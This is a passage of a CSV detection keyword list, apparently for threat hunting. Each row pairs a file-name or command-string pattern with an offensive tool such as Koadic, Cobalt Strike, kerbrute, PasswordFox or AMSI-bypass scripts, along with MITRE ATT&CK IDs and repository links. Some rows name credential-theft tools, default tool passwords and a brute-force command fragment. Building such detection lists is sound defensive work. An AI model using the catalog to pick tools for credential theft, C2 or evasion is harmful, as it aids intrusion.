Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Password*Winter2017*",".{0,1000}Password.{0,1000}Winter2017.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Password: socksPass*",".{0,1000}Password\:\ssocksPass.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Password:Waza1234*",".{0,1000}Password\:Waza1234.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*password_box.py*",".{0,1000}password_box\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*password_cracker.rb*",".{0,1000}password_cracker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*password_crackers*",".{0,1000}password_crackers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Password_Cracking.sh*",".{0,1000}Password_Cracking\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*password_prompt_spoof.md*",".{0,1000}password_prompt_spoof\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*password|passwort|passwd|*",".{0,1000}password\|passwort\|passwd\|.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*password|pwd|creds|cred|secret|userpw*",".{0,1000}password\|pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*PasswordBoxImplant*",".{0,1000}PasswordBoxImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Password-Default/service.txt*",".{0,1000}Password\-Default\/service\.txt.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*passwordfox.exe*",".{0,1000}passwordfox\.exe.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. 
and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*passwordfox.zip*",".{0,1000}passwordfox\.zip.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*passwordfox-x64.zip*",".{0,1000}passwordfox\-x64\.zip.{0,1000}","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. 
and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*password-hijaker.exe*",".{0,1000}password\-hijaker\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*Passwords/Leaked-Databases*.txt*",".{0,1000}Passwords\/Leaked\-Databases.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Passwords_in_description.txt*",".{0,1000}Passwords_in_description\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Password-Scripts*",".{0,1000}Password\-Scripts.{0,1000}","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","97","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" 
"*PasswordSpray *",".{0,1000}PasswordSpray\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*passwordspray*--user-as-pass*",".{0,1000}passwordspray.{0,1000}\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*passwordspray.go*",".{0,1000}passwordspray\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*passwordSprayCmd*",".{0,1000}passwordSprayCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Paste this link - https://akira*",".{0,1000}Paste\sthis\slink\s\-\shttps\:\/\/akira.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*patator ftp_login host=* user=FILE0 0=*.txt 
*",".{0,1000}patator\sftp_login\shost\=.{0,1000}\suser\=FILE0\s0\=.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*patator*",".{0,1000}patator.{0,1000}","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3468","774","2024-01-05T00:46:45Z","2014-08-25T00:56:21Z" "*Patch-AMSI.*",".{0,1000}Patch\-AMSI\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*patchAmsiOpenSession*",".{0,1000}patchAmsiOpenSession.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*patch-amsi-x64-powershell.ps1*",".{0,1000}patch\-amsi\-x64\-powershell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Patch-ETW.*",".{0,1000}Patch\-ETW\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" 
"*Patching-AMSI-AmsiScanBuffer-by-rasta-mouse*",".{0,1000}Patching\-AMSI\-AmsiScanBuffer\-by\-rasta\-mouse.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","image","5","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*PatchingAPI.exe*",".{0,1000}PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*Pateensy/PaensyLib/*",".{0,1000}Pateensy\/PaensyLib\/.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*--path docToDump.xls*",".{0,1000}\-\-path\sdocToDump\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Path to a DDSpoof config file to load configuration from*",".{0,1000}Path\sto\sa\sDDSpoof\sconfig\sfile\sto\sload\sconfiguration\sfrom.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*path_dll_hijack.h*",".{0,1000}path_dll_hijack\.h.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*PATH_EXECUTION_HIJACK_PROGRAM*",".{0,1000}PATH_EXECUTION_HIJACK_PROGRAM.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*pathhijack.py*",".{0,1000}pathhijack\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. 
asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*PaulSec/twittor*",".{0,1000}PaulSec\/twittor.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","752","216","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*PayGen*python3 generate.py*",".{0,1000}PayGen.{0,1000}python3\sgenerate\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*payload start tetanus*",".{0,1000}payload\sstart\stetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*payload.c *",".{0,1000}payload\.c\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability 
(https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*payload.csproj*",".{0,1000}payload\.csproj.{0,1000}","offensive_tool_keyword","scshell","network penetration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload.sct *",".{0,1000}payload\.sct\s.{0,1000}","offensive_tool_keyword","scshell","network penetration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*payload/encryptor_remote.py*",".{0,1000}payload\/encryptor_remote\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*payload_bootstrap_hint*",".{0,1000}payload_bootstrap_hint.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*payload_creator.py*",".{0,1000}payload_creator\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*payload_encryption.py*",".{0,1000}payload_encryption\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*payload_inject.rb*",".{0,1000}payload_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*payload_local*",".{0,1000}payload_local.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
"*payload_msf.c*",".{0,1000}payload_msf\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_msf.exe*",".{0,1000}payload_msf\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_scripts.cna*",".{0,1000}payload_scripts\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 